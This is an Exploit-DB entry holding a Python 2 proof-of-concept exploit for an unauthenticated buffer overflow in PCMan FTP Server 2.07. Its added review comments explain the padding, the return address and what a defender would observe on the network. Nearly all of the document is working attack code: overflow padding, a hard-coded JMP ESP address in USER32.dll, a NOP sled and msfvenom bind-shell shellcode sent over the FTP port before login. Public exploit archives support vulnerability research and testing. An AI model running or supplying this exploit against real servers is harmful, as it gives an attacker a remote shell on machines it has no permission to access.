PCMan FTP Server 2.07 - Remote Buffer Overflow

EDB-ID:

31789


Author:

Sumit

Type:

remote


Platform:

Windows

Date:

2014-02-20


# Exploit Title: PCMAN FTP 2.07 Long Command Buffer Overflow (unauthenticated)
# Date: Feb 19, 2014
# Exploit Author: Sumit
# Version: 2.07
# Tested on: Windows XP Professional SP3
# Description: A buffer overflow is triggered by sending a long string to PCMAN FTP 2.07 in place of a command
#

import socket
import datetime

"""
You have to take into account your IP address and the server's date (if using NAT, check the external IP), because the buffer the server builds starts like the following:
2014/2/20 [00:40] (00320) 127.0.0.100> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
"""

# NOTE(review): proof-of-concept for the PCMan FTP 2.07 overflow described in the
# header. It is Python 2 code (print statement; the str payload is sent as-is) and
# is pinned to the tested environment: the padding length below depends on the
# server's log prefix (date and client IP, see the docstring above), and the
# return address is a fixed USER32.dll location from the "Tested on" build, so a
# different date/IP or a different Windows build most likely just crashes the
# service rather than running the payload. From a defensive standpoint the
# observable behaviour is a single FTP control-channel line of over 2 KB sent
# before any USER/PASS exchange; a successful run additionally leaves the FTP
# server process holding a new listening socket (the payload is a bind shell).
host = '192.168.213.10'   # target; an RFC 1918 lab address, hard-coded with no override

d = str(datetime.datetime.today()).split()[0].split('-') # You should ideally consider servers date here
for i in range(len(d)): d[i] = str(int(d[i]))   # strip zero padding ("02" -> "2") to match the server's "2014/2/20" prefix format
d = '/'.join(d)	# Finally we got the date

# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d'
# Bind-shell payload generated with 0x00/0x0a/0x0d excluded, presumably because a
# NUL or CR/LF would cut the FTP command line short. The port it listens on is
# msfvenom's LPORT setting, which is not recoverable from the bytes below.
shellcode = (
"\xda\xdb\xd9\x74\x24\xf4\xbe\xb5\x40\x16\xb6\x5b\x2b\xc9" +
"\xb1\x56\x31\x73\x18\x83\xeb\xfc\x03\x73\xa1\xa2\xe3\x4a" +
"\x21\xab\x0c\xb3\xb1\xcc\x85\x56\x80\xde\xf2\x13\xb0\xee" +
"\x71\x71\x38\x84\xd4\x62\xcb\xe8\xf0\x85\x7c\x46\x27\xab" +
"\x7d\x66\xe7\x67\xbd\xe8\x9b\x75\x91\xca\xa2\xb5\xe4\x0b" +
"\xe2\xa8\x06\x59\xbb\xa7\xb4\x4e\xc8\xfa\x04\x6e\x1e\x71" +
"\x34\x08\x1b\x46\xc0\xa2\x22\x97\x78\xb8\x6d\x0f\xf3\xe6" +
"\x4d\x2e\xd0\xf4\xb2\x79\x5d\xce\x41\x78\xb7\x1e\xa9\x4a" +
"\xf7\xcd\x94\x62\xfa\x0c\xd0\x45\xe4\x7a\x2a\xb6\x99\x7c" +
"\xe9\xc4\x45\x08\xec\x6f\x0e\xaa\xd4\x8e\xc3\x2d\x9e\x9d" +
"\xa8\x3a\xf8\x81\x2f\xee\x72\xbd\xa4\x11\x55\x37\xfe\x35" +
"\x71\x13\xa5\x54\x20\xf9\x08\x68\x32\xa5\xf5\xcc\x38\x44" +
"\xe2\x77\x63\x01\xc7\x45\x9c\xd1\x4f\xdd\xef\xe3\xd0\x75" +
"\x78\x48\x99\x53\x7f\xaf\xb0\x24\xef\x4e\x3a\x55\x39\x95" +
"\x6e\x05\x51\x3c\x0e\xce\xa1\xc1\xdb\x41\xf2\x6d\xb3\x21" +
"\xa2\xcd\x63\xca\xa8\xc1\x5c\xea\xd2\x0b\xeb\x2c\x1d\x6f" +
"\xb8\xda\x5c\x8f\x2f\x47\xe8\x69\x25\x67\xbc\x22\xd1\x45" +
"\x9b\xfa\x46\xb5\xc9\x56\xdf\x21\x45\xb1\xe7\x4e\x56\x97" +
"\x44\xe2\xfe\x70\x1e\xe8\x3a\x60\x21\x25\x6b\xeb\x1a\xae" +
"\xe1\x85\xe9\x4e\xf5\x8f\x99\xf3\x64\x54\x59\x7d\x95\xc3" +
"\x0e\x2a\x6b\x1a\xda\xc6\xd2\xb4\xf8\x1a\x82\xff\xb8\xc0" +
"\x77\x01\x41\x84\xcc\x25\x51\x50\xcc\x61\x05\x0c\x9b\x3f" +
"\xf3\xea\x75\x8e\xad\xa4\x2a\x58\x39\x30\x01\x5b\x3f\x3d" +
"\x4c\x2d\xdf\x8c\x39\x68\xe0\x21\xae\x7c\x99\x5f\x4e\x82" +
"\x70\xe4\x7e\xc9\xd8\x4d\x17\x94\x89\xcf\x7a\x27\x64\x13" +
"\x83\xa4\x8c\xec\x70\xb4\xe5\xe9\x3d\x72\x16\x80\x2e\x17" +
"\x18\x37\x4e\x32")

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, 21))   # plain FTP control port; the server banner is never read

nop = '\x90'*50   # NOP sled sitting between the return address and the shellcode
eip = '\x53\x93\x42\x7E' # EIP = 7E429353; JMP ESP in USER32.dll (little-endian); only valid for the tested XP SP3 build, an ASLR-enabled build relocates USER32
myip = s.getsockname()[0]   # local address of this socket; behind NAT this differs from what the server logs (see docstring)
padding = 'A' * (2029 - (len(d) + len(myip)))   # keeps date + IP + padding at a constant 2029 bytes so eip lands at the same position regardless of date/IP length

buf = padding + eip + nop + shellcode

s.send('%s\r\n' % (buf))   # sent in place of an FTP command, before any authentication
s.recv(1024)   # blocks for a reply; hangs or errors if the server process died instead
print 'Payload sent'
s.close()